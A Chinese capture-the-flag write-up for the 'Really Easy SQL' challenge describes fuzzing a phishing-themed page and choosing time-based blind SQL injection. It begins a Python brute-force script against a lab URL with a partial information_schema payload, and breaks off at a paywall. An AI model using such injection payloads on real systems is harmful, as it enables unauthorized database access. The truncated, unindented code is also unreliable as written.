[Dest0g3 520迎新赛]Really Easy SQL
信息搜集
题目标题说明是SQL注入
题目首页
页面title显示是钓鱼站点。
钓鱼站点主要为将我们的输入信息保存在数据库。后台应该是插入语句。
fuzz测试
这里无论输入什么都显示密码错误, 只能尝试盲注,基于时间的盲注,
这里经过测试payload如下,
写脚本
内容如下
import requests
import time
from urllib.parse import urlencode
url="http://c3a1a543-3a1c-4f1c-9e6b-1fd5fcf8b280.node5.buuoj.cn:81/"
flag=''
for i in range(1,44):
for j in range(40,137):
#payload="0'or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
